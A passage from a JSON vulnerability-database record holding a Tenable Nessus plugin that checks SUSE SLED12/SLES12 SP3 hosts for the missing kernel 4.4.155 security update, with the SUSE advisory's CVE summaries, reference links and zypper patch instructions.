ext4 filesystem image (bsc#1099844).\n\nCVE-2018-10878: A local user could have caused an out-of-bounds write and a denial of service or unspecified other impact by mounting and operating a crafted ext4 filesystem image (bsc#1099813).\n\nCVE-2018-10876: A use-after-free was possible in ext4_ext_remove_space() function when mounting and operating a crafted ext4 image (bsc#1099811).\n\nCVE-2018-10877: Prevent out-of-bound access in the ext4_ext_drop_refs() function when operating on a crafted ext4 filesystem image (bsc#1099846).\n\nCVE-2018-10881: A local user could have caused an out-of-bound access in ext4_get_group_info function, a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image (bsc#1099864).\n\nCVE-2018-10882: A local user could have caused an out-of-bound write, a denial of service, and a system crash by unmounting a crafted ext4 filesystem image (bsc#1099849).\n\nCVE-2018-10880: Prevent stack-out-of-bounds write in the ext4 filesystem code when mounting and writing to a crafted ext4 image in ext4_update_inline_data(). An attacker could have used this to cause a system crash and a denial of service (bsc#1099845).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "reporter": "Tenable", "published": "2018-09-21T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2018:2776-1)", "type": "nessus", "enchantments": {}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10882", "CVE-2018-10877", "CVE-2018-10880", "CVE-2018-10878", "CVE-2018-13095", "CVE-2018-10881", "CVE-2018-6555", "CVE-2018-13093", "CVE-2018-9363", "CVE-2018-10883", "CVE-2018-16658", "CVE-2018-1129", "CVE-2018-10902", "CVE-2018-10876", "CVE-2018-10938", "CVE-2018-10879", "CVE-2018-1128", "CVE-2018-12896", "CVE-2018-15572", "CVE-2018-6554", "CVE-2018-13094"], "modified": "2018-09-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2018-2776-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2776-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117629);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/21 9:55:47\");\n\n script_cve_id(\"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10880\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-10883\", \"CVE-2018-10902\", \"CVE-2018-10938\", \"CVE-2018-1128\", \"CVE-2018-1129\", \"CVE-2018-12896\", \"CVE-2018-13093\", \"CVE-2018-13094\", \"CVE-2018-13095\", \"CVE-2018-15572\", \"CVE-2018-16658\", \"CVE-2018-6554\", \"CVE-2018-6555\", \"CVE-2018-9363\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2018:2776-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.155 to\nreceive various security and bugfixes.\n\nThe following security bugs were fixed :\n\nCVE-2018-13093: Prevent NULL pointer dereference and panic in\nlookup_slow() on a NULL inode->i_ops pointer when doing pathwalks on a\ncorrupted xfs image. This occured because of a lack of proper\nvalidation that cached inodes are free during allocation\n(bnc#1100001).\n\nCVE-2018-13095: Prevent denial of service (memory corruption and BUG)\nthat could have occurred for a corrupted xfs image upon encountering\nan inode that is in extent format, but has more extents than fit in\nthe inode fork (bnc#1099999).\n\nCVE-2018-13094: Prevent OOPS that may have occured for a corrupted xfs\nimage after xfs_da_shrink_inode() is called with a NULL bp\n(bnc#1100000).\n\nCVE-2018-12896: Prevent integer overflow in the POSIX timer code that\nwas caused by the way the overrun accounting works. Depending on\ninterval and expiry time values, the overrun can be larger than\nINT_MAX, but the accounting is int based. This basically made the\naccounting values, which are visible to user space via\ntimer_getoverrun(2) and siginfo::si_overrun, random. This allowed a\nlocal user to cause a denial of service (signed integer overflow) via\ncrafted mmap, futex, timer_create, and timer_settime system calls\n(bnc#1099922).\n\nCVE-2018-16658: Prevent information leak in cdrom_ioctl_drive_status\nthat could have been used by local attackers to read kernel memory\n(bnc#1107689).\n\nCVE-2018-6555: The irda_setsockopt function allowed local users to\ncause a denial of service (ias_object use-after-free and system crash)\nor possibly have unspecified other impact via an AF_IRDA socket\n(bnc#1106511).\n\nCVE-2018-6554: Prevent memory leak in the irda_bind function that\nallowed local users to cause a denial of service (memory consumption)\nby repeatedly binding an AF_IRDA socket (bnc#1106509).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was\nhandled by cephx authentication protocol. An attacker having access to\nceph cluster network who is able to alter the message payload was able\nto bypass signature checks done by cephx protocol (bnc#1096748).\n\nCVE-2018-1128: It was found that cephx authentication protocol did not\nverify ceph clients correctly and was vulnerable to replay attack. Any\nattacker having access to ceph cluster network who is able to sniff\npackets on network can use this vulnerability to authenticate with\nceph service and perform actions allowed by ceph service\n(bnc#1096748).\n\nCVE-2018-10938: A crafted network packet sent remotely by an attacker\nforced the kernel to enter an infinite loop in the cipso_v4_optptr()\nfunction leading to a denial-of-service (bnc#1106016).\n\nCVE-2018-15572: The spectre_v2_select_mitigation function did not\nalways fill RSB upon a context switch, which made it easier for\nattackers to conduct userspace-userspace spectreRSB attacks\n(bnc#1102517).\n\nCVE-2018-10902: Protect against concurrent access to prevent double\nrealloc (double free) in snd_rawmidi_input_params() and\nsnd_rawmidi_output_status(). A malicious local attacker could have\nused this for privilege escalation (bnc#1105322 1105323).\n\nCVE-2018-9363: Prevent buffer overflow in hidp_process_report\n(bsc#1105292)\n\nCVE-2018-10883: A local user could have caused an out-of-bounds write\nin jbd2_journal_dirty_metadata(), a denial of service, and a system\ncrash by mounting and operating on a crafted ext4 filesystem image\n(bsc#1099863).\n\nCVE-2018-10879: A local user could have caused a use-after-free in\next4_xattr_set_entry function and a denial of service or unspecified\nother impact by renaming a file in a crafted ext4 filesystem image\n(bsc#1099844).\n\nCVE-2018-10878: A local user could have caused an out-of-bounds write\nand a denial of service or unspecified other impact by mounting and\noperating a crafted ext4 filesystem image (bsc#1099813).\n\nCVE-2018-10876: A use-after-free was possible in\next4_ext_remove_space() function when mounting and operating a crafted\next4 image (bsc#1099811).\n\nCVE-2018-10877: Prevent out-of-bound access in the\next4_ext_drop_refs() function when operating on a crafted ext4\nfilesystem image (bsc#1099846).\n\nCVE-2018-10881: A local user could have caused an out-of-bound access\nin ext4_get_group_info function, a denial of service, and a system\ncrash by mounting and operating on a crafted ext4 filesystem image\n(bsc#1099864).\n\nCVE-2018-10882: A local user could have caused an out-of-bound write,\na denial of service, and a system crash by unmounting a crafted ext4\nfilesystem image (bsc#1099849).\n\nCVE-2018-10880: Prevent stack-out-of-bounds write in the ext4\nfilesystem code when mounting and writing to a crafted ext4 image in\next4_update_inline_data(). An attacker could have used this to cause a\nsystem crash and a denial of service (bsc#1099845).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1015342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1015343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1017967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1019699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1020412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1021121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1022604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1024361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1024365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1024376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1027968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1030552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1031492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1033962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1042286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1048317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1050431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1053685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1055014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1056596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1062604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1063646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1064232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1065364\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1066223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1068032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1068075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1069138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1078921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1080157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1083663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1085042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1085536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1085539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1086457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1087092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1089066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1090888\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1091171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1091860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1096254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1096748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1097105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1098253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1098822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099844\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099845\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099846\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1100000\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1100001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1100132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1101822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1101841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1102346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1102486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1102517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1102715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1102797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1103269\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1103445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1103717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104494\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104495\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1104897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105524\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1105769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106276\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106929\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1106995\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1107966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/963575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/969470\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/969476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/969477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/970506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10877.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10878.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10879.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10880.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10881.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10882.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10902.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10938.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1128.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1129.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12896.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-13093.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-13094.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-13095.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15572.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-6554.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-6555.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-9363.html\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182776-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76af87a5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-1941=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-1941=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1941=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2018-1941=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1941=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.155-94.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.155-94.50.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.1, "vector": 